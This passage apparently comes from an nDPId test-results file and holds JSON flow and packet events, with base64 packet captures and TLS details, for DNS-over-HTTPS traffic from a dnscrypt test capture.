IsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiG
X8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2Hs
rFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiH
AAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1eP
ZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority 
X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="} 
+00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaN
